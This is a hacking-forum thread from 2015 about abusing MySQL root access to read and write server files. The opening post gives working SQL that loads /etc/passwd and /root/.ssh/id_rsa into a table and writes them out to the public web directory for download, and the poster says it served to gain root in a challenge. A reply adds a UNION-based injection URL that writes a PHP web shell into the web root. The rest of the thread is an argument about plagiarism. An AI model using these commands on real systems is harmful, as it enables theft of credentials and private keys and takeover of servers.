Read and Write files as MySQL root
#1
I was recently in a situation where I was MySQL root user on a LAMP (Linux Apache MySQL PHP) stack box. It was frustrating trying to figure out how to properly read and write file within MySQL but I was able to figure out a hacky way of doing it.

Firstly you need to create a table to hold your file lines.

Code:
CREATE TABLE file_hax (file VARCHAR(2000));

Then we take a file that we want /etc/passwd, /root/.ssh/id_rsa, etc and write each line to our newly formed table.

Code:
LOAD DATA INFILE '/etc/passwd' INTO TABLE file_hax FIELDS TERMINATED BY '\n';

We now grab that table the holds the individual lines, read it and dump it to the web directory so we can download it.

Code:
SELECT * FROM file_hax INTO OUTFILE '/var/www/html/file.txt';


I hope this helps anyone who has been in a similar situation.

And here was the actual SQL statement I used while figuring this out.

Code:
CREATE TABLE rsa_hax (rsa VARCHAR(2000));LOAD DATA INFILE '/root/.ssh/id_rsa' INTO TABLE rsa_hax FIELDS TERMINATED BY '\n';SELECT * FROM rsa_hax INTO OUTFILE '/var/www/html/id_rsa'; DROP TABLE rsa_hax
Reply
#2
Nice copy paste my friend . I bet you don't even know wtf you just posted
Reply
#3
(07-21-2015, 06:53 PM)Root Wrote: Nice copy paste my friend . I bet you don't even know wtf you just posted

copied from where? back up your claims before you go accusing well known members of pasting threads.
Reply
#4
(07-21-2015, 06:53 PM)Root Wrote: Nice copy paste my friend . I bet you don't even know wtf you just posted

Incase you didn't know it yet, NO-OP is a security professional. I know for a fact that he has an actual job within the IT-security field, and he works with security and programming on a daily basis. There's no way he'd actually need to plagiarise others content.

Would you please be so kind and cite your sources which could prove this is a 'copypasta'? That would be great.
Reply
#5
(07-21-2015, 06:53 PM)Root Wrote: Nice copy paste my friend . I bet you don't even know wtf you just posted

I haven't sourced this method or the SQL statements from any specific source. I have looked into how to parse lines from a file and how to write to files(well that one I've known for a while, but either way).

If you have a source please provide a link and I'll gladly include it in the original post, since it might including more information for people to learn from. But even if such a document does exist it is purely under independent creation both existing without knowledge of each other.

I think you should look at what people post and the threads they create before you make accusations that are presented with no actual proof. I think you should take a step back next time and really think about what you write.

The way you behave really does not make your vague answer for your age in your intro post justice, because your actions are similar to that of a twelve year old. "Age ~ Old Enough to join"

Either way thank you for bumping my response-less thread.
Reply
#6
(07-22-2015, 08:51 AM)NO-OP Wrote:
(07-21-2015, 06:53 PM)Root Wrote: Nice copy paste my friend . I bet you don't even know wtf you just posted

I haven't sourced this method or the SQL statements from any specific source. I have looked into how to parse lines from a file and how to write to files(well that one I've known for a while, but either way).

If you have a source please provide a link and I'll gladly include it in the original post, since it might including more information for people to learn from. But even if such a document does exist it is purely under independent creation both existing without knowledge of each other.

I think you should look at what people post and the threads they create before you make accusations that are presented with no actual proof. I think you should take a step back next time and really think about what you write.

The way you behave really does not make your vague answer for your age in your intro post justice, because your actions are similar to that of a twelve year old. "Age ~ Old Enough to join"

Either way thank you for bumping my response-less thread.


Why did you created a table and done all the shit while You can easily drop a php shell using Outfile
I see no point why u need to create a table to upload a shell

http://www.example .com/abh.php?=10'UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,'phpcode ',22,23,24,25,26,27,28,29,30,31 into outfile '/mnt/var/www/html/user/shell.php'--+-/
Reply
#7
(07-24-2015, 01:22 PM)Root Wrote: I see no point why u need to create a table to upload a shell

Shell? what shell? doesn't even look like you understood what his code was doing...
Reply
#8
(07-24-2015, 01:22 PM)Root Wrote:
(07-22-2015, 08:51 AM)NO-OP Wrote:
(07-21-2015, 06:53 PM)Root Wrote: Nice copy paste my friend . I bet you don't even know wtf you just posted

I haven't sourced this method or the SQL statements from any specific source. I have looked into how to parse lines from a file and how to write to files(well that one I've known for a while, but either way).

If you have a source please provide a link and I'll gladly include it in the original post, since it might including more information for people to learn from. But even if such a document does exist it is purely under independent creation both existing without knowledge of each other.

I think you should look at what people post and the threads they create before you make accusations that are presented with no actual proof. I think you should take a step back next time and really think about what you write.

The way you behave really does not make your vague answer for your age in your intro post justice, because your actions are similar to that of a twelve year old. "Age ~ Old Enough to join"

Either way thank you for bumping my response-less thread.


Why did you created a table and done all the shit while You can easily drop a php shell using Outfile
I see no point why u need to create a table to upload a shell

http://www.example .com/abh.php?=10'UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,'phpcode ',22,23,24,25,26,27,28,29,30,31 into outfile '/mnt/var/www/html/user/shell.php'--+-/

"It was frustrating trying to figure out how to properly read and write file within MySQL but I was able to figure out a hacky way of doing it."

This was during a challenge at which point I had www shell access and mysql creds. The thing I was trying to do was become root on a fully patched system and it worked by grabbing a private key. Alternatively I could have crack the passwd file but grabbing the private key was quicker and in a real life scenario would do more potential damage.
Reply
#9
(07-24-2015, 02:26 PM)MuddyBucket Wrote:
(07-24-2015, 01:22 PM)Root Wrote: I see no point why u need to create a table to upload a shell

Shell? what shell? doesn't even look like you understood what his code was doing...

" Read and Write files as MySQL root "
Do you understand what's code doing ?

(07-25-2015, 01:11 AM)NO-OP Wrote:
(07-24-2015, 01:22 PM)Root Wrote:
(07-22-2015, 08:51 AM)NO-OP Wrote:
(07-21-2015, 06:53 PM)Root Wrote: Nice copy paste my friend . I bet you don't even know wtf you just posted

I haven't sourced this method or the SQL statements from any specific source. I have looked into how to parse lines from a file and how to write to files(well that one I've known for a while, but either way).

If you have a source please provide a link and I'll gladly include it in the original post, since it might including more information for people to learn from. But even if such a document does exist it is purely under independent creation both existing without knowledge of each other.

I think you should look at what people post and the threads they create before you make accusations that are presented with no actual proof. I think you should take a step back next time and really think about what you write.

The way you behave really does not make your vague answer for your age in your intro post justice, because your actions are similar to that of a twelve year old. "Age ~ Old Enough to join"

Either way thank you for bumping my response-less thread.


Why did you created a table and done all the shit while You can easily drop a php shell using Outfile
I see no point why u need to create a table to upload a shell

http://www.example .com/abh.php?=10'UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,'phpcode ',22,23,24,25,26,27,28,29,30,31 into outfile '/mnt/var/www/html/user/shell.php'--+-/

"It was frustrating trying to figure out how to properly read and write file within MySQL but I was able to figure out a hacky way of doing it."

This was during a challenge at which point I had www shell access and mysql creds. The thing I was trying to do was become root on a fully patched system and it worked by grabbing a private key. Alternatively I could have crack the passwd file but grabbing the private key was quicker and in a real life scenario would do more potential damage.

Umm ? What's the point of thread to confuse users by making random table which won't help in any way to real and write file
or just use use loadfile and dumpfile To read and write files
Reply
#10
(07-26-2015, 12:49 PM)Root Wrote: " Read and Write files as MySQL root "
Do you understand what's code doing ?

LOL I accuse you of not understanding his code, and your response is to ask me if I understand what his code is doing. Ya... I think you're just deflecting the fact that you're an idiot.

And yes, I understand what this/his code is doing. It's very clearly reading the passwd file, into a publicly readable file in a web directory. and then provided another example doing the same for the id_rsa file. So again I ask you - what part of that did you interpret as 'uploading a shell'?
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [Tutorial] Request header MySQL injection using netcat and burp suite Insider 0 526 06-16-2020, 02:53 AM
Last Post: Insider
  Basics of website and server hacking Insider 0 1,584 03-26-2020, 09:34 PM
Last Post: Insider
  Re-posted and Updated [Complete MySQL Injection] Insider 5 12,536 04-28-2019, 09:46 PM
Last Post: thunder
  Web scraper/parser and spider/crawler ipwn 4 5,669 06-20-2018, 03:10 PM
Last Post: ekultek